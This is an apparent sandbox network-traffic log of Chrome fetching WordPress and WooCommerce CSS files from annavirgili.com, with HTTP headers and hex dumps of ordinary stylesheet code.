                                                                                                          2024-12-12 11:57:59 UTC8192INData Raw: 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 73 71 75 61 72 65 3a 20 31 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 34 2d 33 3a 20 34 2f 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                                                                          Data Ascii: 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset-
                                                                                                          2024-12-12 11:57:59 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-12 11:57:59 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                          Data Ascii: 2000
                                                                                                          2024-12-12 11:57:59 UTC8192INData Raw: 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b
                                                                                                          Data Ascii: -wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk
                                                                                                          2024-12-12 11:57:59 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-12 11:57:59 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                          Data Ascii: 2000


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2449776147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:00 UTC618OUTGET /wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:01 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:39:36 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3382
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:01 UTC3382INData Raw: 2e 63 69 65 6e 61 2d 63 61 74 65 67 6f 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 2e 63 69 65 6e 61 2d 63 61 74 65 67 6f 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 63 61 74 65 67 6f 72 79 5f 63 6f 6e 74 65 6e 74 5f 77 72 61 70 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 32 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 20 66 69 78 65 64 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 74 65 78
                                                                                                          Data Ascii: .ciena-category-background { position: relative; height: 100vh; overflow: hidden;}.ciena-category-background .category_content_wrap { position: relative; z-index: 2; display: table; height: 100%; table-layout: fixed; width: 100%; tex


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2449774147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:00 UTC594OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:01 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 12 Nov 2024 22:21:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 114706
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61
                                                                                                          Data Ascii: @charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-a
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 38 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 39 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 39 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67
                                                                                                          Data Ascii: ound-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-backg
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 20 31 65 6d 20 31 65 6d 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 65 6d 29 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d
                                                                                                          Data Ascii: .wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 1em 1em 0;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-im
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 36 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 36 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72
                                                                                                          Data Ascii: yle*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-r
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 6c 65 66 74 3a 31 30 30 25 3b 74 6f 70 3a 2d 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 7b 62 61
                                                                                                          Data Ascii: x){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ba
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 70 2d 63 6f 6d 6d 65 6e 74 2d 63 6f 6f 6b 69 65 73 2d 63 6f 6e 73 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 33 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 2d 66 6f 72 6d 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 2d 66 6f 72 6d 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 20 3a 77 68 65 72 65 28 73 6d 61 6c 6c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 2c 73 6d 61 6c 6c 65 72 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                                                                          Data Ascii: p-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 6c 61 73 74 66 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 32 31 62 32 34 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 6c 69 6e 6b 65 64 69 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 64 36 36 63 32 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c
                                                                                                          Data Ascii: here(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}:where(.wp-block-social
                                                                                                          2024-12-12 11:58:01 UTC18INData Raw: 69 74 69 6f 6e 2d 6f 66 66 73 65 74 3a 30 70 78 7d 7d
                                                                                                          Data Ascii: ition-offset:0px}}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2449773147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:00 UTC638OUTGET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.2 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:01 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 4933
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:01 UTC4933INData Raw: 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2d 63 6f 6e 74 72 6f 6c 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2d 63 6f 6e 74 72 6f 6c 5f 5f 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2d 63 6f 6e 74 72 6f 6c 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 37 35 37 35 37 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
                                                                                                          Data Ascii: .components-custom-select-control{position:relative}.components-custom-select-control__label{display:block;margin-bottom:8px}.components-custom-select-control__button{border:1px solid #757575;border-radius:2px;min-height:30px;min-width:130px;position:rela


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2449775147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:01 UTC630OUTGET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.6.2 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:01 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 211622
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 2e 77 63 2d 62 6c 6f 63 6b 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 74 72
                                                                                                          Data Ascii: .wc-block-link-button{border:0;border-radius:0;margin:0;padding:0;vertical-align:baseline;color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit;text-tr
                                                                                                          2024-12-12 11:58:01 UTC16384INData Raw: 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 65 6d 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 65 6d 7d 2e 69 73 2d 6c 6f 61 64 69 6e 67 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 6f 64 75 63 74 2d 62 75 74 74 6f 6e 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 6f 64 75 63 74 2d 62 75 74 74 6f 6e 5f 5f 62 75 74 74 6f 6e 3e 2a 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 69 73 2d 6c 6f 61 64 69 6e 67 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 6f 64 75 63 74 2d 62 75 74 74 6f 6e 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74
                                                                                                          Data Ascii: ;pointer-events:none;box-shadow:none;z-index:1;min-width:8em;min-height:3em}.is-loading .wc-block-components-product-button>.wc-block-components-product-button__button>*{visibility:hidden}.is-loading .wc-block-components-product-button>.wc-block-component
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 61 79 6d 65 6e 74 2d 6d 65 74 68 6f 64 2d 69 63 6f 6e 73 2d 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 61 79 6d 65 6e 74 2d 6d 65 74 68 6f 64 2d 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 61 79 6d 65 6e 74 2d 6d 65 74 68 6f 64 2d 69 63 6f 6e 73 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 69 73 2d 6d 6f 62 69 6c 65 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 61 79 6d 65 6e 74 2d 6d 65 74 68 6f 64
                                                                                                          Data Ascii: ent:flex-end}.wc-block-components-payment-method-icons--align-right .wc-block-components-payment-method-icon{margin-right:0;margin-left:8px}.wc-block-components-payment-method-icons:last-child{margin-bottom:0}.is-mobile .wc-block-components-payment-method
